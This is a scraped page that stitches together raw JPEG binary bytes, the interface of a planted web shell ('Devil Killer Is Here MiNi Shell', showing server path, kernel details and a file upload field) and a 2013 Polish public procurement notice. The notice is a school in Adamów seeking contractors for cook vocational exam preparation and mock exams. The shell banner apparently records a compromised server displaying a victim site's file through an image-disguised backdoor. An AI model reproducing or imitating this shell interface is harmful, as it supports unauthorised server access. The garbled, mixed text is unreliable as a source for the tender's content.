JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130507/68205-N-2013.html

<p class="kh_header"><b>Adamów: Przeprowadzenie zajęć przygotowujących do egzaminu teoretycznego 
w zawodzie kucharz, przygotowanie testów sprawdzających do egzaminu teoretycznego, przeprowadzenie próbnych egzaminów zawodowych teoretycznych i praktycznych oraz sprawdzenie testów sprawdzających wiedzę w ramach projektu pn.: Zasadnicza Szkoła Zawodowa w Adamowie Twoją szansą</b><br>
<b>Numer ogłoszenia: 68205 - 2013; data zamieszczenia: 07.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Gen. F. Kamińskiego w  Adamowie , ul. Cmentarna 6, 21-412 Adamów, woj. lubelskie, tel. 25 7553169, faks 25 b7553169.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adamow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka podległa administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć przygotowujących do egzaminu teoretycznego 
w zawodzie kucharz, przygotowanie testów sprawdzających do egzaminu teoretycznego, przeprowadzenie próbnych egzaminów zawodowych teoretycznych i praktycznych oraz sprawdzenie testów sprawdzających wiedzę w ramach projektu pn.: Zasadnicza Szkoła Zawodowa w Adamowie Twoją szansą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na przeprowadzeniu zajęć przygotowujących do egzaminu teoretycznego w zawodzie kucharz, przygotowanie testów sprawdzających do egzaminu teoretycznego, przeprowadzenie próbnych egzaminów zawodowych teoretycznych i praktycznych oraz sprawdzenie testów sprawdzających wiedzę w zawodzie kucharz zgodnie z wymaganiami Okręgowej Komisji Egzaminacyjnej (OKE), dla uczniów Zasadniczej Szkoły Zawodowej w Adamowie przy Zespole Szkół im. Gen. F. Kamińskiego w Adamowie, w ramach projektu pn.: Zasadnicza Szkoła Zawodowa w Adamowie Twoją szansą.
Przedmiot zamówienia obejmuje 10 następujących części: 
Część 1 - Przeprowadzenie zajęć przygotowujących do egzaminu zawodowego teoretycznego w zawodzie kucharz
Dodatkowe zajęcia, kompetencje zawodowe, przeprowadzenie zajęć przygotowujących do egzaminu zawodowego teoretycznego w zawodzie kucharz dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie.
Sposób prowadzenia zajęć: zajęcia prowadzone z uczennicami i uczniami (uczestniczkami i uczestnikami projektu) Zasadniczej Szkoły Zawodowej 
w Adamowie w roku szkolnym: 2013/2014 (semestr II, 7 godz.), 2014/2015 (semestr I i II, 28 godz.)
Forma zajęć: zajęcia prowadzone będą przez cały okres obowiązywania umowy dla 2 grup uczniów łącznie (1 gr. x 21h, 1 gr. x 14h),. Łączna ilość godzin dydaktycznych zajęć - 35 godzin zajęć (1 godzina zajęć = 45 minut). 
Termin realizacji zajęć: od dnia podpisania umowy do 28 lutego 2015 roku - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy
Miejsce realizacji zajęć: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego w Adamowie

Część 2 - Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przygotowanie testów sprawdzających wiedzę w zawodzie kucharz
Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przygotowanie testów sprawdzających wiedzę w zawodzie kucharz  dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przygotowanie 8 różnych kompletów testów na każdy 
z 3 egzaminów zawodowych teoretycznych, zgodnie z wymaganiami Okręgowej Komisji Egzaminacyjnej.
Forma: 8 różnych kompletów testów sprawdzających wiedzę w zawodzie kucharz na każdy z 3 egzaminów - 24 różne testy.
Termin realizacji: od dnia podpisania umowy do 24 maja 2013 r. - pierwszy komplet testów, drugi i trzeci  komplet testów najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.

Część 3 - Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu
Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu dla uczennic i uczniów Zasadniczej Szkoły Zawodowej 
w Adamowie.
Zakres prac do wykonania przeprowadzenie 3 teoretycznych egzaminów zawodowych w zawodzie kucharz 
Forma: przeprowadzenie 3 dwugodzinnych egzaminów 
Przewidywania łączna liczba godzin egzaminów - 6 godzin zegarowych (3 egzaminy x 2 godziny) 
Termin realizacji: od dnia podpisania umowy do 29 maja 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie

Część 4 - Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - sprawdzenie testów sprawdzających wiedzę w zawodzie kucharz
Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - sprawdzenie testów sprawdzających wiedzę w zawodzie kucharz dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie.
Zakres prac do wykonania: sprawdzenie 24 testów sprawdzających wiedzę 
w zawodzie kucharz, zgodnie ze standardami OKE.
Forma: sprawdzenie 24 testów sprawdzających wiedzę w zawodzie kucharz  (8 testów x 3 grupy)
Termin realizacji: od dnia podpisania umowy do 5 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji zajęć: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie

Część 5 - Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przygotowanie zadań z dokumentacją
Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przygotowanie zadań z dokumentacją dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przygotowanie 3 różnych wersji zadań z dokumentacją na każdy z 3 próbnych egzaminów zawodowych praktycznych, zgodnie z wymaganiami OKE.
Forma: 3 różne wersje zadań z dokumentacją na każdy z 3 egzaminów zawodowych praktycznych (9 różnych wersji zadań z dokumentacją)
Termin realizacji: od dnia podpisania umowy do 5 czerwca -2013 r. - pierwszy zestaw zadań  drugi i trzeci zestaw zadań najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie

Część 6 - Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przeprowadzenie egzaminu
Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przeprowadzenie próbnego egzaminu zawodowego praktycznego dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przeprowadzenie i ocena próbnego egzaminu praktycznego w zawodzie kucharz, zgodnie z wymaganiami OKE 
Forma: przeprowadzenie 3 trzygodzinnych egzaminów
Przewidywania łączna liczba godzin egzaminów - 9 godzin zegarowych (3 egzaminy x 3 godziny) 
Termin realizacji: od dnia podpisania umowy do 12 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin ? najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie

Część 7 - Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu
Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu dla uczennic i uczniów Zasadniczej Szkoły Zawodowej 
w Adamowie.
Zakres prac do wykonania przeprowadzenie 3 teoretycznych egzaminów zawodowych w zawodzie kucharz 
Forma: przeprowadzenie 3 dwugodzinnych egzaminów 
Przewidywania łączna liczba godzin egzaminów - 6 godzin zegarowych (3 egzaminy x 2 godziny) 
Termin realizacji: od dnia podpisania umowy do 29 maja 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie

Część 8 - Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu
Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu dla uczennic i uczniów Zasadniczej Szkoły Zawodowej 
w Adamowie.
Zakres prac do wykonania przeprowadzenie 3 teoretycznych egzaminów zawodowych w zawodzie kucharz 
Forma: przeprowadzenie 3 dwugodzinnych egzaminów 
Przewidywania łączna liczba godzin egzaminów - 6 godzin zegarowych (3 egzaminy x 2 godziny) 
Termin realizacji: od dnia podpisania umowy do 29 maja 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie
Komisja egzaminacyjna będzie składała się z 3 Wykonawców wyłonionych oddzielnie w części 3, 7 i 8

Część 9 - Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przeprowadzenie egzaminu
Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przeprowadzenie próbnego egzaminu zawodowego praktycznego dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przeprowadzenie i ocena próbnego egzaminu praktycznego w zawodzie kucharz, zgodnie z wymaganiami OKE 
Forma: przeprowadzenie 3 trzygodzinnych egzaminów
Przewidywania łączna liczba godzin egzaminów - 9 godzin zegarowych (3 egzaminy x 3 godziny) 
Termin realizacji: od dnia podpisania umowy do 12 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin ? najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie

Część 10 - Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przeprowadzenie egzaminu
Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przeprowadzenie próbnego egzaminu zawodowego praktycznego dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przeprowadzenie i ocena próbnego egzaminu praktycznego w zawodzie kucharz, zgodnie z wymaganiami OKE 
Forma: przeprowadzenie 3 trzygodzinnych egzaminów
Przewidywania łączna liczba godzin egzaminów - 9 godzin zegarowych (3 egzaminy x 3 godziny) 
Termin realizacji: od dnia podpisania umowy do 12 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin ? najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego w Adamowie
Komisja egzaminacyjna będzie składała się z 3 Wykonawców wyłonionych oddzielnie w części 6, 9 i 10
Zakres obowiązków Wykonawcy:
a) dla części 1:
-  dostarczenie w dniu zawarcia umowy o udzielenie zamówienia publicznego programu zajęć przygotowujących do egzaminu zawodowego teoretycznego w zawodzie kucharz, opracowanego na wzorze stanowiącym załącznik nr 1 do umowy, dostosowanego do planowanej liczby zajęć i zaakceptowanego przez Koordynatora szkolnego projektu,
- prowadzenie zajęć zgodnie z zatwierdzonym programem oraz harmonogramem godzin,
- pisemne (e-mailowe) informowanie z min. 1-dniowym wyprzedzeniem Koordynatora szkolnego projektu  o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem,  
- bieżące dokumentowanie prowadzonych zajęć w dzienniku zajęć oraz bieżąca kontrola frekwencji i monitorowanie uczniów,  
- sporządzanie sprawozdania z realizacji usługi w terminie 5 dni po zakończeniu każdego kwartału  i złożenie go koordynatorowi szkolnemu projektu,  
- współpraca z personelem projektu w celu prawidłowej realizacji zajęć, przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.)  
- przestrzeganie przepisów BHP oraz ppoż. w czasie trwania zajęć,  
-zapewnienie ładu i porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczących w zajęciach oraz zgodnego z przeznaczeniem użytkowania sali, sprzętu, materiałów i pomocy dydaktycznych, 
- pełna odpowiedzialność za powierzone mienie zgodnie z warunkami zawartej umowy,
-wykorzystywanie wzorów dokumentów przekazanych przez Lidera,  
- prowadzenie miesięcznej ewidencji czasu pracy własnej,  
- dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego.

b) dla części 2 i 5 
- dostarczenie w terminach uzgodnionych z koordynatorem szkolnym wymaganych dokumentów,
- współpraca z personelem projektu w celu prawidłowej realizacji umowy, przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.) ,
-wykorzystywanie wzorów dokumentów przekazanych przez Lidera,  
- prowadzenie miesięcznej ewidencji czasu pracy własnej,  
- dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego. 

c) dla części 3, 6, 7, 8, 9 i 10.
- przeprowadzenie egzaminów w terminach uzgodnionych z koordynatorem szkolnym,
- współpraca z personelem projektu w celu prawidłowej realizacji umowy, przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.) ,
-wykorzystywanie wzorów dokumentów przekazanych przez Lidera,  
- prowadzenie miesięcznej ewidencji czasu pracy własnej,  
- dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego. 

d) dla części 4
- sprawdzenie testów w terminach uzgodnionych z koordynatorem szkolnym,
- współpraca z personelem projektu w celu prawidłowej realizacji umowy, przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.) ,
-wykorzystywanie wzorów dokumentów przekazanych przez Lidera,  
- prowadzenie miesięcznej ewidencji czasu pracy własnej,  
- dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w odniesieniu do Wykonawców, którzy dysponują osobami zdolnymi do wykonania zamówienia, w tym co najmniej jedną osobą posiadającą: dla części 1 -  wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne, doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany
dla części 2 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne, doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 3 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 4 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 5 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 6 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 7 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 8 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 9 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE
dla części 10 - wykształcenie średnie, pozytywny wynik z egzaminu maturalnego, przygotowanie pedagogiczne,  doświadczenie w pracy pedagogicznej z młodzieżą min. 3 lata, w tym min. 2 lata z uczniami Zasadniczej Szkoły Zawodowej, nauczyciel mianowany, uprawnienia egzaminatora OKE</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
